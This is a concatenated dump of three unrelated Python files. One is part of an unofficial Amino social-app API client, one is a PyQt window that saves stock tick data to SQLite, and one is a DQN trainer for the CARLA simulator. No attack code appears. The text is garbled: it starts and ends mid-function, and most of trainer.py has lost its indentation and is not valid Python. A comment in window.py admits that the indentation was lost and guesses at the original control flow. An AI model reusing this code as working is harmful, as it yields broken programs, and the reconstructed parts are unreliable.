        raise exceptions.SpecifyType
    response = requests.delete(url, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def like_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
    """
    Like a Comment on a User's Wall, Blog or Wiki.
    **Parameters**
        - **commentId** : ID of the Comment.
        - **userId** : ID of the User. (for Walls)
        - **blogId** : ID of the Blog. (for Blogs)
        - **wikiId** : ID of the Wiki. (for Wikis)
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    payload = {
        "value": 4,
        "timestamp": int(timestamp() * 1000)
    }
    # Exactly one target kind is used; precedence is user > blog > wiki.
    if userId:
        payload["eventSource"] = "UserProfileView"
        url = f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?cv=1.2&value=1"
    elif blogId:
        payload["eventSource"] = "PostDetailView"
        url = f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?cv=1.2&value=1"
    elif wikiId:
        payload["eventSource"] = "PostDetailView"
        url = f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?cv=1.2&value=1"
    else:
        raise exceptions.SpecifyType
    data = json.dumps(payload)
    response = requests.post(url, headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def unlike_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
    """
    Remove a like from a Comment on a User's Wall, Blog or Wiki.
    **Parameters**
        - **commentId** : ID of the Comment.
        - **userId** : ID of the User. (for Walls)
        - **blogId** : ID of the Blog. (for Blogs)
        - **wikiId** : ID of the Wiki. (for Wikis)
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    if userId:
        url = f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?eventSource=UserProfileView"
    elif blogId:
        url = f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?eventSource=PostDetailView"
    elif wikiId:
        url = f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?eventSource=PostDetailView"
    else:
        raise exceptions.SpecifyType
    response = requests.delete(url, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def get_membership_info(self):
    """
    Get Information about your Amino+ Membership.
    **Parameters**
        - No parameters required.
    **Returns**
        - **Success** : :meth:`Membership Object <amino.lib.src.objects.Membership>`
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    response = requests.get(
        f"{self.api}/g/s/membership?force=true",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return objects.Membership(json.loads(response.text)).Membership
    return exceptions.CheckException(json.loads(response.text))

def get_ta_announcements(self, language: str = "en", start: int = 0, size: int = 25):
    """
    Get the list of Team Amino's Announcement Blogs.
    **Parameters**
        - **language** : Language of the Blogs.
            - ``en``, ``es``, ``pt``, ``ar``, ``ru``, ``fr``, ``de``
        - *start* : Where to start the list.
        - *size* : Size of the list.
    **Returns**
        - **Success** : :meth:`Blogs List <amino.lib.src.objects.BlogList>`
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    # Validate against the server-provided language list before requesting.
    if language not in self.get_supported_languages():
        raise exceptions.UnsupportedLanguage(language)
    response = requests.get(
        f"{self.api}/g/s/announcement?language={language}&start={start}&size={size}",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return objects.BlogList(json.loads(response.text)["blogList"]).BlogList
    return exceptions.CheckException(json.loads(response.text))
def get_wallet_info(self):
    """
    Get Information about the account's Wallet.
    **Parameters**
        - No parameters required.
    **Returns**
        - **Success** : :meth:`Wallet Object <amino.lib.src.objects.WalletInfo>`
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    response = requests.get(
        f"{self.api}/g/s/wallet",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return objects.WalletInfo(json.loads(response.text)["wallet"]).WalletInfo
    return exceptions.CheckException(json.loads(response.text))

def get_wallet_history(self, start: int = 0, size: int = 25):
    """
    Get the Wallet's History Information.
    **Parameters**
        - *start* : Where to start the list.
        - *size* : Size of the list.
    **Returns**
        - **Success** : :meth:`Wallet History <amino.lib.src.objects.WalletHistory>`
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    response = requests.get(
        f"{self.api}/g/s/wallet/coin/history?start={start}&size={size}",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return objects.WalletHistory(json.loads(response.text)["coinHistoryList"]).WalletHistory
    return exceptions.CheckException(json.loads(response.text))
def get_from_deviceid(self, deviceId: str):
    """
    Get the User ID from an Device ID.
    **Parameters**
        - **deviceID** : ID of the Device.
    **Returns**
        - **Success** : :meth:`User ID <amino.lib.src.objects.UserProfile.userId>`
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    # NOTE: this endpoint is queried without auth headers/proxies,
    # matching the upstream API behavior.
    response = requests.get(f"{self.api}/g/s/auid?deviceId={deviceId}")
    if response.status_code == 200:
        return json.loads(response.text)["auid"]
    return exceptions.CheckException(json.loads(response.text))

def get_from_code(self, code: str):
    """
    Get the Object Information from the Amino URL Code.
    **Parameters**
        - **code** : Code from the Amino URL.
            - ``http://aminoapps.com/p/EXAMPLE``, the ``code`` is 'EXAMPLE'.
    **Returns**
        - **Success** : :meth:`From Code Object <amino.lib.src.objects.FromCode>`
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    response = requests.get(
        f"{self.api}/g/s/link-resolution?q={code}",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
    return exceptions.CheckException(json.loads(response.text))
def get_from_id(self, objectId: str, objectType: int, comId: str = None):
    """
    Get the Object Information from the Object ID and Type.
    **Parameters**
        - **objectID** : ID of the Object. User ID, Blog ID, etc.
        - **objectType** : Type of the Object.
        - *comId* : ID of the Community. Use if the Object is in a Community.
    **Returns**
        - **Success** : :meth:`From Code Object <amino.lib.src.objects.FromCode>`
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    data = json.dumps({
        "objectId": objectId,
        "targetCode": 1,
        "objectType": objectType,
        "timestamp": int(timestamp() * 1000)
    })
    # Community-scoped objects resolve through the "s-x{comId}" prefix.
    url = f"{self.api}/g/s-x{comId}/link-resolution" if comId else f"{self.api}/g/s/link-resolution"
    response = requests.post(url, headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
    if response.status_code == 200:
        return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
    return exceptions.CheckException(json.loads(response.text))
def get_supported_languages(self):
    """
    Get the List of Supported Languages by Amino.
    **Parameters**
        - No parameters required.
    **Returns**
        - **Success** : :meth:`List of Supported Languages <List>`
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    response = requests.get(
        f"{self.api}/g/s/community-collection/supported-languages?start=0&size=100",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return json.loads(response.text)["supportedLanguages"]
    return exceptions.CheckException(json.loads(response.text))

def claim_new_user_coupon(self):
    """
    Claim the New User Coupon available when a new account is created.
    **Parameters**
        - No parameters required.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    response = requests.post(
        f"{self.api}/g/s/coupon/new-user-coupon/claim",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def get_subscriptions(self, start: int = 0, size: int = 25):
    """
    Get Information about the account's Subscriptions.
    **Parameters**
        - *start* : Where to start the list.
        - *size* : Size of the list.
    **Returns**
        - **Success** : :meth:`List <List>`
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    response = requests.get(
        f"{self.api}/g/s/store/subscription?objectType=122&start={start}&size={size}",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return json.loads(response.text)["storeSubscriptionItemList"]
    return exceptions.CheckException(json.loads(response.text))

def get_all_users(self, start: int = 0, size: int = 25):
    """
    Get list of users of Amino.
    **Parameters**
        - *start* : Where to start the list.
        - *size* : Size of the list.
    **Returns**
        - **Success** : :meth:`User Profile Count List Object <amino.lib.src.objects.UserProfileCountList>`
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    response = requests.get(
        f"{self.api}/g/s/user-profile?type=recent&start={start}&size={size}",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return objects.UserProfileCountList(json.loads(response.text)).UserProfileCountList
    return exceptions.CheckException(json.loads(response.text))
def accept_host(self, chatId: str, requestId: str):
    """
    Accept a pending organizer (host) transfer request for a chat.
    **Parameters**
        - **chatId** : ID of the Chat.
        - **requestId** : ID of the transfer request.
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    # Endpoint expects an (empty) JSON body so headers are signed over it.
    data = json.dumps({})
    response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/transfer-organizer/{requestId}/accept", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
    if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
    else: return response.status_code

def accept_organizer(self, chatId: str, requestId: str):
    """
    Alias of :meth:`accept_host`.

    Bug fix: the original swallowed accept_host's result and always
    returned None; the status code / exception is now propagated.
    """
    return self.accept_host(chatId, requestId)
# Contributed by 'https://github.com/LynxN1'
def link_identify(self, code: str):
    """Resolve an invite code and return the raw JSON response as a dict.

    Note: unlike most methods here, this returns the parsed body directly
    without status-code checking.
    """
    url = f"{self.api}/g/s/community/link-identify?q=http%3A%2F%2Faminoapps.com%2Finvite%2F{code}"
    response = requests.get(url, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
    return json.loads(response.text)
def invite_to_vc(self, chatId: str, userId: str):
    """
    Invite a User to a Voice Chat
    **Parameters**
        - **chatId** - ID of the Chat
        - **userId** - ID of the User
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    data = json.dumps({"uid": userId})
    response = requests.post(
        f"{self.api}/g/s/chat/thread/{chatId}/vvchat-presenter/invite",
        headers=self.parse_headers(data=data),
        data=data,
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def wallet_config(self, level: int):
    """
    Changes ads config
    **Parameters**
        - **level** - Level of the ads.
            - ``1``, ``2``
    **Returns**
        - **Success** : 200 (int)
        - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
    """
    data = json.dumps({"adsLevel": level, "timestamp": int(timestamp() * 1000)})
    response = requests.post(
        f"{self.api}/g/s/wallet/ads/config",
        headers=self.parse_headers(data=data),
        data=data,
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return response.status_code
    return exceptions.CheckException(json.loads(response.text))
def get_avatar_frames(self, start: int = 0, size: int = 25):
    """Fetch a page of avatar frames and wrap it in an AvatarFrameList."""
    response = requests.get(
        f"{self.api}/g/s/avatar-frame?start={start}&size={size}",
        headers=self.parse_headers(),
        proxies=self.proxies,
        verify=self.certificatePath,
    )
    if response.status_code == 200:
        return objects.AvatarFrameList(json.loads(response.text)["avatarFrameList"]).AvatarFrameList
    return exceptions.CheckException(json.loads(response.text))
|
window.py | import os
import sys
import sqlite3
import logging
from PyQt5 import QtCore
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPalette
from multiprocessing import Process, Queue
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import *
from utility.static import now, strf_time
class Window(QtWidgets.QMainWindow):
    """Frameless monitor window showing tick-data save progress and stats.

    Log lines arrive through the module-level windowQ (relayed by Writer)
    and are appended to a read-only text edit; '부가정보' messages update
    the status label instead.
    """

    def __init__(self):
        super().__init__()
        self.log = logging.getLogger('Window')
        self.log.setLevel(logging.INFO)
        handler = logging.FileHandler(filename=f"{system_path}/Log/T{strf_time('%Y%m%d')}.txt", encoding='utf-8')
        self.log.addHandler(handler)

        def make_textedit(parent):
            # Read-only, scrollbar-less text area styled for the dark theme.
            widget = QtWidgets.QTextEdit(parent)
            widget.setReadOnly(True)
            widget.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
            widget.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
            widget.setStyleSheet(style_bc_dk)
            widget.setFont(qfont1)
            return widget

        self.setFont(qfont1)
        self.setWindowFlags(Qt.FramelessWindowHint)
        self.setGeometry(0, 0, 692, 292)
        self.lg_tabWidget = QtWidgets.QTabWidget(self)
        self.lg_tabWidget.setGeometry(5, 5, 682, 282)
        self.lg_tab = QtWidgets.QWidget()
        self.lg_textEdit = make_textedit(self.lg_tab)
        self.lg_textEdit.setGeometry(5, 5, 668, 242)
        self.lg_tabWidget.addTab(self.lg_tab, '틱데이터 저장')
        self.info_label = QtWidgets.QLabel(self)
        self.info_label.setGeometry(105, 1, 500, 30)
        # Background thread that forwards queue messages into UpdateTexedit.
        self.writer = Writer()
        self.writer.data0.connect(self.UpdateTexedit)
        self.writer.start()

    def UpdateTexedit(self, msg):
        """Append a log line, or route '부가정보' stat messages to the label."""
        if '부가정보' in msg:
            parts = msg.split(' ')
            self.UpdateInfo(parts[1], parts[2])
        else:
            self.lg_textEdit.setTextColor(color_fg_dk)
            self.lg_textEdit.append(f'[{now()}] {msg}')
            self.log.info(f'[{now()}] {msg}')
            if msg == '시스템 명령 실행 알림 - 시스템 종료':
                sys.exit()

    def UpdateInfo(self, jcps, hjps):
        """Refresh the status label with tick rates and total queue backlog."""
        tickqsize = sum(q.qsize() for q in (tick1Q, tick2Q, tick3Q, tick4Q,
                                            tick5Q, tick6Q, tick7Q, tick8Q))
        label01text = f'Data Received - RTJC {jcps}TICKps | RTHJ {hjps}TICKps, Queue size - tickQ {tickqsize}'
        self.info_label.setText(label01text)
class Writer(QtCore.QThread):
    """QThread that relays strings from the module-level windowQ into a signal."""
    data0 = QtCore.pyqtSignal(str)

    def __init__(self):
        super().__init__()

    def run(self):
        # Blocking consume-and-emit loop; runs for the life of the process.
        while True:
            self.data0.emit(windowQ.get())
class Query:
    """Consumer process: drains ``queryQ`` and persists tick DataFrames to SQLite.

    Runs in its own multiprocessing.Process; expects exactly 8 producer
    (UpdaterTick) processes to each put one dict of {code: DataFrame}.
    """

    def __init__(self, windowQQ, workerQQ, queryQQ):
        # Queues shared with the GUI (status text), worker, and producers.
        self.windowQ = windowQQ
        self.workerQ = workerQQ
        self.queryQ = queryQQ
        self.Start()

    def Start(self):
        # k counts processed producer batches (message shows Proc[k/8]).
        k = 1
        while True:
            # Blocks until one producer delivers its {code: DataFrame} dict.
            query = self.queryQ.get()
            if len(query) > 0:
                j = 1
                con = sqlite3.connect(db_tick)
                for code in list(query.keys()):
                    # One table per stock code; append rows in 1000-row chunks.
                    query[code].to_sql(code, con, if_exists='append', chunksize=1000)
                    self.windowQ.put(f'시스템 명령 실행 알림 - 틱데이터 저장 중...Proc[{k}/8] Dict[{j}/{len(query)}]')
                    j += 1
                con.close()
                # NOTE(review): original indentation was lost in this dump; k is
                # assumed to increment only after a non-empty batch is saved —
                # confirm against the upstream source.
                k += 1
                if k == 9:
                    break
        self.workerQ.put('틱데이터 저장 완료')
if __name__ == '__main__':
    # Module-level queues: GUI log feed, worker control, DB writer input,
    # and one tick queue per UpdaterTick process.
    windowQ, workerQ, queryQ = Queue(), Queue(), Queue()
    tick1Q, tick2Q, tick3Q, tick4Q, tick5Q, tick6Q, tick7Q, tick8Q = \
        [Queue() for _ in range(8)]
    from worker import Worker
    from updater_tick import UpdaterTick
    # Spawn the DB writer first, then the 8 tick updaters, then the worker.
    Process(target=Query, args=(windowQ, workerQ, queryQ), daemon=True).start()
    for tickQ in (tick1Q, tick2Q, tick3Q, tick4Q, tick5Q, tick6Q, tick7Q, tick8Q):
        Process(target=UpdaterTick, args=(tickQ, queryQ, workerQ, windowQ), daemon=True).start()
    Process(target=Worker, args=(windowQ, workerQ,
                                 tick1Q, tick2Q, tick3Q, tick4Q, tick5Q, tick6Q, tick7Q, tick8Q), daemon=True).start()
    app = QtWidgets.QApplication(sys.argv)
    app.setStyle('fusion')
    # Apply the shared dark palette.
    palette = QPalette()
    for role, color in (
        (QPalette.Window, color_bg_bc),
        (QPalette.Background, color_bg_bc),
        (QPalette.WindowText, color_fg_bc),
        (QPalette.Base, color_bg_bc),
        (QPalette.AlternateBase, color_bg_dk),
        (QPalette.Text, color_fg_bc),
        (QPalette.Button, color_bg_bc),
        (QPalette.ButtonText, color_fg_bc),
        (QPalette.Link, color_fg_bk),
        (QPalette.Highlight, color_fg_bk),
        (QPalette.HighlightedText, color_bg_bk),
    ):
        palette.setColor(role, color)
    app.setPalette(palette)
    window = Window()
    window.show()
    app.exec_()
|
trainer.py | import os
import sys
import settings
from sources import ARTDQNAgent, TensorBoard, STOP, ACTIONS, ACTIONS_NAMES
from collections import deque
import time
import random
import numpy as np
import pickle
import json
from dataclasses import dataclass
from threading import Thread
# Try to mute and then load Tensorflow
# Muting seems to not work lately on Linux in any way
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
stdin = sys.stdin
sys.stdin = open(os.devnull, 'w')
stderr = sys.stderr
sys.stderr = open(os.devnull, 'w')
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import keras.backend.tensorflow_backend as backend
sys.stdin = stdin
sys.stderr = stderr
# Trainer class
class ARTDQNTrainer(ARTDQNAgent):
def __init__(self, model_path):
    """Create the trainer's main model and capture the TF graph.

    model_path: path to an existing model; create_model (inherited from
    ARTDQNAgent) uses it instead of building a fresh network when set.
    """
    # If model path is being passed in - use it instead of creating a new one
    self.model_path = model_path
    self.model = self.create_model()
    # We are going to train a model in a loop using separate thread
    # Tensorflow needs to know about the graph to use as we load or create model in main thread
    # Save model graph as object property for later use
    self.graph = tf.get_default_graph()
# Init is being split into two parts. Firs one is being loaded always, but this one only for training
# (when calculating weights we don't need that)
def init2(self, stop, logdir, trainer_stats, episode, epsilon, discount, update_target_every, last_target_update, min_reward, agent_show_preview, save_checkpoint_every, seconds_per_episode, duration, optimizer, models, car_npcs):
# Trainer does not use convcam
self.show_conv_cam = False
# Target network
self.target_model = self.create_model(prediction=True)
self.target_model.set_weights(self.model.get_weights())
# An array with last n transitions for training
self.replay_memory = deque(maxlen=settings.REPLAY_MEMORY_SIZE)
# Set log dir for tensorboard - either create one or use (if passed in) existing one
# Create tensorboard object and set current step (being an episode for the agent)
self.logdir = logdir if logdir else "logs/{}-{}".format(settings.MODEL_NAME, int(time.time()))
self.tensorboard = TensorBoard(log_dir=self.logdir)
self.tensorboard.step = episode.value
# Used to count when to update target network with main network's weights
self.last_target_update = last_target_update
# Internal properties
self.last_log_episode = 0
self.tps = 0
self.last_checkpoint = 0
self.save_model = False
# Shared properties - either used by model or only for checkpoint purposes
self.stop = stop
self.trainer_stats = trainer_stats
self.episode = episode
self.epsilon = epsilon
self.discount = discount
self.update_target_every = update_target_every
self.min_reward = min_reward
self.agent_show_preview = agent_show_preview
self.save_checkpoint_every = save_checkpoint_every
self.seconds_per_episode = seconds_per_episode
self.duration = duration
self.optimizer = optimizer
self.models = models
self.car_npcs = car_npcs
# Update optimizer stats with lr and decay
self.optimizer[0], self.optimizer[1] = self.get_lr_decay()
# Adds transition (step's data) to a memory replay list
# (observation space, action, reward, new observation space, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
# Trains main network every step during episode
def train(self):
# Start training only if certain number of transitions is already being saved in replay memory
if len(self.replay_memory) < settings.MIN_REPLAY_MEMORY_SIZE:
return False
# Get a minibatch of random samples from memory replay table
minibatch = random.sample(self.replay_memory, settings.MINIBATCH_SIZE)
# Get current states from minibatch, then query NN model for Q values
current_states = [np.array([transition[0][0] for transition in minibatch])/255]
if 'kmh' in settings.AGENT_ADDITIONAL_DATA:
current_states.append((np.array([[transition[0][1]] for transition in minibatch]) - 50) / 50)
if 'd2wp' in settings.AGENT_ADDITIONAL_DATA:
current_states.append((np.array([[transition[0][2]] for transition in minibatch]) - 8) / 8)
if 'd2goal' in settings.AGENT_ADDITIONAL_DATA:
current_states.append((np.array([[transition[0][3]] for transition in minibatch]) - 150) / 150)
# We need to use previously saved graph here as this is going to be called from separate thread
with self.graph.as_default():
current_qs_list = self.model.predict(current_states, settings.PREDICTION_BATCH_SIZE)
# Get future states from minibatch, then query NN model for Q values
# When using target network, query it, otherwise main network should be queried
new_current_states = [np.array([transition[3][0] for transition in minibatch])/255]
if 'kmh' in settings.AGENT_ADDITIONAL_DATA:
new_current_states.append((np.array([[transition[3][1]] for transition in minibatch]) - 50) / 50)
if 'd2wp' in settings.AGENT_ADDITIONAL_DATA:
new_current_states.append((np.array([[transition[3][2]] for transition in minibatch]) - 8) / 8)
if 'd2goal' in settings.AGENT_ADDITIONAL_DATA:
new_current_states.append((np.array([[transition[3][3]] for transition in minibatch]) - 150) / 150)
with self.graph.as_default():
future_qs_list = self.target_model.predict(new_current_states, settings.PREDICTION_BATCH_SIZE)
X = []
if 'kmh' in settings.AGENT_ADDITIONAL_DATA:
X_kmh = []
if 'd2wp' in settings.AGENT_ADDITIONAL_DATA:
X_d2wp = []
if 'd2goal' in settings.AGENT_ADDITIONAL_DATA:
X_d2goal = []
y = []
# Enumerate samples in minibatch
for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
# If it's not a terminal state, get new Q value from future states, otherwise set it to a reward
# almost like with Q Learning, but we use just part of equation here
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + self.discount.value * max_future_q
else:
new_q = reward
# Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
# And append to our training data
X.append(current_state[0])
if 'kmh' in settings.AGENT_ADDITIONAL_DATA:
X_kmh.append([current_state[1]])
if 'd2wp' in settings.AGENT_ADDITIONAL_DATA:
X_d2wp.append([current_state[2]])
if 'd2goal' in settings.AGENT_ADDITIONAL_DATA:
X_d2goal.append([current_state[3]])
y.append(current_qs)
# Log only on terminal state. As trainer trains in an asynchronous way, it does not know when
# and which agent just finished an episode. Instead of that we monitor episode number and once
# it changes, we log current .fit() call. We do that as we do want to save stats once per every episode
log_this_step = False
if self.tensorboard.step > self.last_log_episode:
log_this_step = True
self.last_log_episode = self.tensorboard.step
# Prepare inputs
Xs = [np.array(X)/255]
if 'kmh' in settings.AGENT_ADDITIONAL_DATA:
Xs.append((np.array(X_kmh) - 50) / 50)
if 'd2wp' in settings.AGENT_ADDITIONAL_DATA:
Xs.append((np.array(X_d2wp) - 8) / 8)
if 'd2goal' in settings.AGENT_ADDITIONAL_DATA:
Xs.append((np.array(X_d2goal) - 150) / 150)
# Fit on all samples as one batch
with self.graph.as_default():
self.model.fit(Xs, np.array(y), batch_size=settings.TRAINING_BATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if log_this_step else None)
# Update optimizer with new values if there are nay
if self.optimizer[2] == 1:
self.optimizer[2] = 0
#backend.set_value(self.model.optimizer.lr, self.optimizer[3])
self.compile_model(model=self.model, lr=self.optimizer[3], decay=self.get_lr_decay()[1])
if self.optimizer[4] == 1:
self.optimizer[4] = 0
#backend.set_value(self.model.optimizer.decay, self.optimizer[5])
self.compile_model(model=self.model, lr=self.get_lr_decay()[0], decay=self.optimizer[5])
# Update optimizer stats with lr and decay
self.optimizer[0], self.optimizer[1] = self.get_lr_decay()
# If step counter reaches set value, update target network with weights of main network
if self.tensorboard.step >= self.last_target_update + self.update_target_every.value:
self.target_model.set_weights(self.model.get_weights())
self.last_target_update += self.update_target_every.value
return True
# Returns current learning rate and decay values from Adam optimizer
def get_lr_decay(self):
lr = self.model.optimizer.lr
if self.model.optimizer.initial_decay > 0:
lr = lr * (1. / (1. + self.model.optimizer.decay * backend.cast(self.model.optimizer.iterations, backend.dtype(self.model.optimizer.decay))))
return backend.eval(lr), backend.eval(self.model.optimizer.decay)
# Prepares weights to be send to agents over shared object
def serialize_weights(self):
return pickle.dumps(self.model.get_weights())
# Creates first set of weights to agents to load when they start
# Uses shared object, updates it and updates weights iteration counter so agents can see a change
def init_serialized_weights(self, weights, weights_iteration):
self.weights = weights
self.weights.raw = self.serialize_weights()
self.weights_iteration = weights_iteration
# Trains model in a loop, called from a separate thread
def train_in_loop(self):
self.tps_counter = deque(maxlen=20)
# Train infinitively
while True:
# For training speed measurement
step_start = time.time()
# If 'stop' flag - exit
if self.stop.value == STOP.stopping:
return
# If Carla broke - pause training
if self.stop.value in [STOP.carla_simulator_error, STOP.restarting_carla_simulator]:
self.trainer_stats[0] = TRAINER_STATE.paused
time.sleep(1)
continue
# If .train() call returns false, there's not enough transitions in replay memory
# Just wait (and exit on 'stop' signal)
if not self.train():
self.trainer_stats[0] = TRAINER_STATE.waiting
# Trainer is also a manager for stopping everything as it has to save a checkpoint
if self.stop.value in [STOP.at_checkpoint, STOP.now]:
self.stop.value = STOP.stopping
time.sleep(0.01)
continue
# If we are here, trainer trains a model
self.trainer_stats[0] = TRAINER_STATE.training
# Share new weights with models as fast as possible
self.weights.raw = self.serialize_weights()
with self.weights_iteration.get_lock():
self.weights_iteration.value += 1
# Training part finished here, measure time and convert it to number of trains per second
frame_time = time.time() - step_start
self.tps_counter.append(frame_time)
self.trainer_stats[1] = len(self.tps_counter)/sum(self.tps_counter)
# Shared flag set by models when they performed good to save a model
save_model = self.save_model
if save_model:
self.model.save(save_model)
self.save_model = False
# Checkpoint - if given number of episodes passed, save a checkpoint
# Checkpoints does not contain all data, they do not include stats,
# but stats are not important for training. Checkpoint does not contain replay memory
# as saving several GB of data wil slow things down significantly and
# fill-up disk space quickly
checkpoint_number = self.episode.value // self.save_checkpoint_every.value
# Save every nth step and on 'stop' flag
if checkpoint_number > self.last_checkpoint or self.stop.value == STOP.now:
# Create and save hparams file
self.models.append(f'checkpoint/{settings.MODEL_NAME}_{self.episode.value}.model')
hparams = {
'duration': self.duration.value,
'episode': self.episode.value,
'epsilon': list(self.epsilon),
'discount': self.discount.value,
'update_target_every': self.update_target_every.value,
'last_target_update': self.last_target_update,
'min_reward': self.min_reward.value,
'agent_show_preview': [list(preview) for preview in self.agent_show_preview],
'save_checkpoint_every': self.save_checkpoint_every.value,
'seconds_per_episode': self.seconds_per_episode.value,
'model_path': f'checkpoint/{settings.MODEL_NAME}_{self.episode.value}.model',
'logdir': self.logdir,
'weights_iteration': self.weights_iteration.value,
'car_npcs': list(self.car_npcs),
'models': list(set(self.models))
}
# Save the model
self.model.save(f'checkpoint/{settings.MODEL_NAME}_{hparams["episode"]}.model')
with open('checkpoint/hparams_new.json', 'w', encoding='utf-8') as f:
json.dump(hparams, f)
try:
os.remove('checkpoint/hparams.json')
except:
pass
try:
os.rename('checkpoint/hparams_new.json', 'checkpoint/hparams.json')
self.last_checkpoint = checkpoint_number
except Exception as e:
print(str(e))
# Handle for 'stop' signal
if self.stop.value in [STOP.at_checkpoint, STOP.now]:
self.stop.value = STOP.stopping
# Trainer states
class TRAINER_STATE:
    """Integer constants describing what the trainer loop is currently doing.

    Plain class attributes are used on purpose: the previous ``@dataclass``
    decorator generated no fields (the attributes carry no type annotations),
    so it only added unused ``__init__``/``__repr__``/``__eq__`` methods and
    has been removed. Values index into TRAINER_STATE_MESSAGE.
    """
    starting = 0
    waiting = 1
    training = 2
    finished = 3
    paused = 4
# Trainer state messages
# Human-readable labels for each TRAINER_STATE value (keyed by the state int).
TRAINER_STATE_MESSAGE = {
    0: 'STARTING',
    1: 'WAITING',
    2: 'TRAINING',
    3: 'FINISHED',
    4: 'PAUSED',
}
# Creates a model, dumps weights and saves this number
# We need this side to know how big shared object to create
def check_weights_size(model_path, weights_size):
    """Measure how many bytes the serialized model weights occupy.

    Runs in its own process: creates the model and writes the pickled weight
    size into the shared `weights_size` Value, so the parent knows how big a
    shared buffer to allocate for weight exchange.
    """
    # Limit this process's GPU memory fraction
    gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=settings.TRAINER_MEMORY_FRACTION)
    backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))

    # Create a model and save serialized weights' size
    trainer = ARTDQNTrainer(model_path)
    weights_size.value = len(trainer.serialize_weights())
# Runs trainer process
def run(model_path, logdir, stop, weights, weights_iteration, episode, epsilon, discount, update_target_every, last_target_update, min_reward, agent_show_preview, save_checkpoint_every, seconds_per_episode, duration, transitions, tensorboard_stats, trainer_stats, episode_stats, optimizer, models, car_npcs, carla_settings_stats, carla_fps):
    """Trainer process entry point.

    Creates the trainer, starts the training thread, then loops: pulls agent
    transitions into replay memory, aggregates per-episode stats from the
    shared queues, logs them to TensorBoard and triggers model saves.
    All arguments after `logdir` are shared multiprocessing objects.
    """
    # Set GPU used for the trainer
    if settings.TRAINER_GPU is not None:
